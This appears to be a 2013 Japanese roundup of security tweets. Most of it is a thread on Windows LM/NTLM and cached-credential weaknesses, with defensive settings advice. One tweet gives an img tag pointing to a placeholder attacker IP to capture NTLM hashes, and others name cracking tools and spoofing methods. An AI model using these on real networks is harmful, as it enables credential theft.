9月7〜8日のtwitterセキュリティクラスタ

yousukezan
9月7日のtwitterセキュリティクラスタです。JOEっていろいろな意味で危険ですね。

JOEパスワードでのアクセスは不正アクセスに当たらない!?

河瀬 季@tokikawase

書いた → 「パスワード=ID」な場合でも「不正アクセス」で逮捕されるの!? | あんどろいどスマート android-smart.com/2013/09/unauth…
2013.09.08 21:45
https://twitter.com/tokikawase/status/376687759349383169

Kieta(監視されています)@typex20

不正アクセスにはならないという見解はなんか腑に落ちない、セキュリティの運用に不備があると罪を問えないなら既存の法律に不備があるのかも。 / “「パスワード=ID」な場合でも「不正アクセス」で逮捕されるの!? | あんどろいどスマート” htn.to/TD8mfM
2013.09.08 19:24
https://twitter.com/typex20/status/376652171871154176

河瀬 季@tokikawase

@typex20 僕も個人的にはそう考えています。不正アクセス、未遂罪がないので、これが不正アクセスにならないと、「(FTPあたりを想定し)適当なIDにpwd=IDで試行しまくる」がフリーハンドになりそうな…。東北大の方がどう考えているのか資料が見つからなかったんですが…
2013.09.09 01:41
https://twitter.com/tokikawase/status/376747083731968000

河瀬 季@tokikawase

1.pwd=idなら不正アクセスの構成要件非該当、だと仮にすると、2.不正アクセスは未遂処罰なし、だから、ftpか何かで適当なidとpwd=idで試行しまくるのは、業務妨害レベルなdosにならない限り不可罰、ですよね。仮にそうなら、速やかに未遂処罰すべきである気がする
2013.09.09 01:57
https://twitter.com/tokikawase/status/376751234167734272

Youhei Kondou@dw3w4at

Joeアカウントをはじかない認証システムがタコなのと、不正アクセス禁止法の要件を満たさないか否かは、全く別問題じゃね?
2013.09.08 20:43
https://twitter.com/dw3w4at/status/376672012510318596

kusanoさん@がんばらない@kusano_k

パスワードで=IDで、IDに規則性があるって、もはや不正アクセス禁止法が定義する識別符号では無いのでは……?
【大阪市職員不正アクセス】自分の所得証明書を偽造か 人事評価、昇任試験の資料ものぞく – MSN産経west
sankei.jp.msn.com/west/west_affa…
2013.09.08 18:39
https://twitter.com/kusano_k/status/376641055518490625

パスワードの定期的変更とそれにちょっと関連したWindowsの認証についての連続ツイート。必見です。

piyokango@piyokango

世の中に満ち溢れる「パスワードの定期的変更」についてまとめてみた。 – piyolog d.hatena.ne.jp/Kango/20130907…
2013.09.07 11:27
https://twitter.com/piyokango/status/376169871886671872

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

世の中に満ち溢れる「パスワードの定期的変更」についてまとめてみた。 – piyolog (id:Kango / @piyokango) d.hatena.ne.jp/Kango/20130907…
2013.09.07 11:31
https://twitter.com/kitagawa_takuji/status/376170732645933056

Sen UENO@sen_u

パスワードの定期変更はDoDのPassword Management Guideline CSC-STD-002-85.あたりが古い話なのかな?定期変更すべしや、有効期限が安全なパスワード長計算式に入ってたり。 bit.ly/15Djf2P
2013.09.07 17:49
https://twitter.com/sen_u/status/376265921565696001

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

自分はパスワードの定期変更否定派ですが、lastpassというパスワード管理ソフトを使っていると、パスワードの変更があまりにも簡単なので結構頻繁に変更してしまいます。最初は15桁のランダムだったのが、それでは飽き足らなくなって20桁のランダム、次は30桁のランダムと、
2013.09.07 11:53
https://twitter.com/kitagawa_takuji/status/376176285476605952

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

1)前に何度も書いているが、Windowsアカウントについては、LAN内のLM/NTLM認証のチャレンジ/レスポンスを簡単に取得できる手法がいくつもあるので/etc/passwdにパスワードハッシュが格納されていて誰でも見れる状態と同じと考えたほうが良い
2013.09.07 17:03
https://twitter.com/kitagawa_takuji/status/376254412638785536

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

2)LM/NTLM認証のチャレンジ/レスポンスは、ADやSAMに保存されるLMハッシュ、NTLMハッシュとは別物、John the RipperではNETLM, NETLMv2, NETNTLM, NETNTLMv2と呼ばれる
2013.09.07 17:03
https://twitter.com/kitagawa_takuji/status/376254483975532544

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

3)特にLM認証は危険、LMには前半後半7文字ずつのチャンクへの分割、大小英字を区別しないという問題があるので14文字以下ならどんなに複雑なパスワードでも1日以内に解析可能
2013.09.07 17:04
https://twitter.com/kitagawa_takuji/status/376254545573056513

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

4)Vista以降ではLmCompatibilityLevel「3:NTLMv2応答のみ送信」が既定になっているが、XPでは「0.LMとNTLM応答を送信」が既定。LMハッシュを保存しないようにしていてもLmCompatibilityLevelが0か1だとLM応答を送信してしまう
2013.09.07 17:04
https://twitter.com/kitagawa_takuji/status/376254623511613440

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

5)但し、LmCompatibilityLevelが0か1でも15文字以上のパスワードにすればLM応答は送信されない(無効な値が送られる)
2013.09.07 17:04
https://twitter.com/kitagawa_takuji/status/376254696958066688

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

6)よって、パスワードの定期変更よりもLmCompatibilityLevelの方が重要。XPでは規定値から2又は3に変更。Vista以降で、NTLMv2に対応していない古いNASとの互換性のために変更する場合も、決して0や1にしてはならない
2013.09.07 17:04
https://twitter.com/kitagawa_takuji/status/376254759147028480

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

7)oclhashcat-plus hashcat.net/oclhashcat-plu… などのGPUを使用したパスワード解析ツールもNetNTLMv2に対応してきているので、「NTLMv2応答のみ送信」の場合でも決して安心ではなく、十分に複雑なパスワードにする必要がある
2013.09.07 17:05
https://twitter.com/kitagawa_takuji/status/376254823223410688

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

8)Webサービスの認証の場合、ストレッチ回数を増やすなどして計算量を増やすことができるが、LM/NTLM認証では計算量は固定で変更出来ない。しかも10数年前の設計で現在のようにGPUを使用したクラックなど考慮されていない
2013.09.07 17:05
https://twitter.com/kitagawa_takuji/status/376254885366214656

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

9)「NTLMv2応答のみ送信」の場合、何文字以上なら安心かは難しいが、自分なら英数字記号混在で13文字以上、ハギーアタック(ショルダーハッキングとオフラインクラックの組み合わせ)を考慮すると15文字以上にするかな?
2013.09.07 17:05
https://twitter.com/kitagawa_takuji/status/376254949455171584

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

10)さすがに全ユーザにそこまでのポリシーを強要するのは難しいという場合、有効期限を設けて定期変更させるのも低減策の1つにはなると思う。もっともLAN上の人は全て信用出来るという前提があれば、そこまでは必要ないかもしれないが、既にLAN上のPCが乗っ取られている可能性もある
2013.09.07 17:06
https://twitter.com/kitagawa_takuji/status/376255038538010624

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

11)もう1つ加えると、DCC(Domain Cached Credentials)の問題、ドメイン下のWindowsではログオン時にドメイン・コントローラに接続出来ない場合でもログオン出来るように以前のログオン情報がローカルにキャッシュされている(既定で過去10ユーザを記録)
2013.09.07 17:06
https://twitter.com/kitagawa_takuji/status/376255130883997696

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

12)レジストリよりDCCを取り出すツールはcachedump、MetasploitのPostモジュール等色々あり、取り出したハッシュはJohn-the-Ripper、CainやGPU対応のoclhashcat-plus等で解析できる
2013.09.07 17:06
https://twitter.com/kitagawa_takuji/status/376255215151747072

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

13)DCCのアルゴリズムはNTLMハッシュを改良したもの。Vista以降では更にアルゴリズムが強化されているが解析ツールはどちらにも対応している。NTLMハッシュと同一ではないのでPass-the-Hashは出来ない
2013.09.07 17:07
https://twitter.com/kitagawa_takuji/status/376255298484203520

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

14)PCの初期セットアップ時の動作確認で情シス部員がドメイン管理者でログインしたり、システム管理者やヘルプデスクなどがリモートデスクトップでドメイン管理者でログインして作業するとDCCが記録される
2013.09.07 17:07
https://twitter.com/kitagawa_takuji/status/376255367283372032

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

15)DCCは既定で過去10ユーザが記録されるので(10回のログインではない)、数年前の管理者ログオンがキャッシュに残っている可能性がある。但し、PsExec、WMICなどのネットワークログオンではDCCは記録されないので、運用管理にはPsExec、WMICを使うのも一案
2013.09.07 17:07
https://twitter.com/kitagawa_takuji/status/376255426716647424

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

16)標的型攻撃などでWindows端末が乗っ取られると、DCCを取得してドメイン管理者のパスワードを解析するのは攻撃者の常套手段。DCCを記録しないように設定することもできるが、ドメイン障害時やノートPCをオフラインで使用する時にログオン出来なくなる
2013.09.07 17:07
https://twitter.com/kitagawa_takuji/status/376255508090339328

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

17)よって、ドメイン管理者などの管理者パスワードは、例えハッシュを取得されても簡単には解析されないよう。十分長く複雑なものにする必要がある
2013.09.07 17:08
https://twitter.com/kitagawa_takuji/status/376255560212946944

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

18)Windowsの認証関係は、このようにかなり脆弱な状態だが、過去との互換性の問題もありバッサリ切り捨てるわけにもいかないだろう。問題を認識しつつ、付き合っていくことが必要
2013.09.07 17:08
https://twitter.com/kitagawa_takuji/status/376255664818888704

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

19)昨日のWindowsアカウントのパスワード解析に関する話 togetter.com/li/560409 の補足で、LAN内のLM/NTLM認証のチャレンジ/レスポンスを取得する方法について書いてみたい
2013.09.08 11:46
https://twitter.com/kitagawa_takuji/status/376537004411871232

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

20)Windowsではファイル共有などネットワーク上のリソースにアクセスする場合、自動的にログオンしているユーザでの認証要求を送出してしまう。認証はチャレンジ/レスポンス方式で行われ、その両方をキャプチャすることでパスワードの解析が出来る
2013.09.08 11:46
https://twitter.com/kitagawa_takuji/status/376537084279808002

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

21)自動送信された認証が失敗するとダイアログが出るので、ダイアログにID・パスワードを入力し送信した時に初めて認証要求が送出されると錯覚してしまいがちだが、最初にアクセスした段階で既に自動送出されてしまっているのである
2013.09.08 11:47
https://twitter.com/kitagawa_takuji/status/376537197114961921

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

22)よって、攻撃者が自分がコントロールできるPC上でファイル共有を作成し、「資料を公開しました」などの通知を行えば、後はアクセスしてきた認証要求のチャレンジ/レスポンスをキャプチャし、解析するだけ
2013.09.08 11:47
https://twitter.com/kitagawa_takuji/status/376537287061798912

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

23)また、社内Webなどに<img src=file://\\攻撃者のIP\image.gif>というタグを含んだページを作成したり、そのようなタグを埋め込んだWord文書などを作成し添付ファイルで送信したりすれば、認証要求が自動的に飛んでくる
2013.09.08 11:48
https://twitter.com/kitagawa_takuji/status/376537438358753280

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

24)ファイル共有だけでなく、NTLM認証を有効にしたWebサーバをイントラネットゾーンに立て、誘導すればブラウザが認証情報を自動送信する(IEの場合)
2013.09.08 11:48
https://twitter.com/kitagawa_takuji/status/376537530188832769

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

25)その他、NetBIOSの名前要求に対し攻撃者のIPにスプーフィングしたレスポンスを返す、ARP PoisoningによるLayer2でのキャプチャなど、様々な手法があり、それぞれの手法に対し様々なツールが提供されている
2013.09.08 11:48
https://twitter.com/kitagawa_takuji/status/376537614301401088

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

26)キャプチャしたチャレンジ/レスポンスはJohn the RipperやマルチGPUに対応したoclhashcat-plus hashcat.net/oclhashcat-plu… などで高速に解析出来る
2013.09.08 11:49
https://twitter.com/kitagawa_takuji/status/376537704793513984

北河拓士 KITAGAWA,Takuji@kitagawa_takuji

27)Windowsアカウントに関しては/etc/passwdにパスワードハッシュが格納されていて誰でも見れる状態と同じと考えたほうが良いというのはそういうこと
2013.09.08 11:49
https://twitter.com/kitagawa_takuji/status/376537780311977984

その他に気になったことはこのあたり。

眠る羊@sleep_sheep2010

アカウントを乗っ取る『Twitpic』の偽装アプリ【認証注意】 – NAVER まとめ matome.naver.jp/odai/213323784… これは紛らわしいし、知らないと騙される危険が高い…。Picture TwitpicはTwitpicじゃない、と。
2013.09.07 16:07
https://twitter.com/sleep_sheep2010/status/376240236222631936

Yucco@受験までツイ減@ikura_oxo

Security camp 2013 に参加してきました(小並感) – G.t.o.e yuccoo.hatenablog.jp/entry/2013/09/…
やっとこさ書きました!!!!
2013.09.08 00:25
https://twitter.com/ikura_oxo/status/376365630313594880

Mitsuhiko Maruyama@maruchan_MM

夏井先生=>米国NSAと英国GCHQはインターネット上のどんな暗号文でも解読可能 cyberlaw.cocolog-nifty.com/blog/2013/09/n…
2013.09.08 12:37
https://twitter.com/maruchan_MM/status/376549774733762560

NHKニュース@nhk_news

独誌「米英情報機関 スマホに侵入可能」 nhk.jp/N49N62Dy03 #nhk_news
2013.09.09 04:11
https://twitter.com/nhk_news/status/376784785198174208

Fox News@FoxNews

#NSA can access most smartphone data, report says fxn.ws/17IOTj4
2013.09.08 23:24
https://twitter.com/FoxNews/status/376712702615633920

ITmedia@itmedia

[エンタープライズ]Torの接続ユーザーが激増、ボットネットの仕業と判断 bit.ly/17j9PfH
2013.09.09 07:40
https://twitter.com/itmedia/status/376837427718914049

ITmedia@itmedia

[エンタープライズ]JavaやFlashの脆弱性放置、依然として多数の状況――Websense調査 bit.ly/15bNYYc
2013.09.09 07:50
https://twitter.com/itmedia/status/376839919861121024

セキュリティのささやき@ScanNetSecurity

Scan名誉編集長 りく君の セキュリティにゃークサイド「大阪市職員が不正アクセスして人事評価を盗み見してたんだにゃーの巻」(9月9日版) dlvr.it/3wzpZJ
2013.09.09 08:52
https://twitter.com/ScanNetSecurity/status/376855565290319872
今週も書いたにゃー。
https://matome.naver.jp/odai/2137854150461881401
yousukezan
2013年09月09日

前の記事

アキバに女子向け「アニメイトAKIBAガールズステーション」が…

次の記事

シュタゲゼロ 比屋定真帆のイラストまとめ。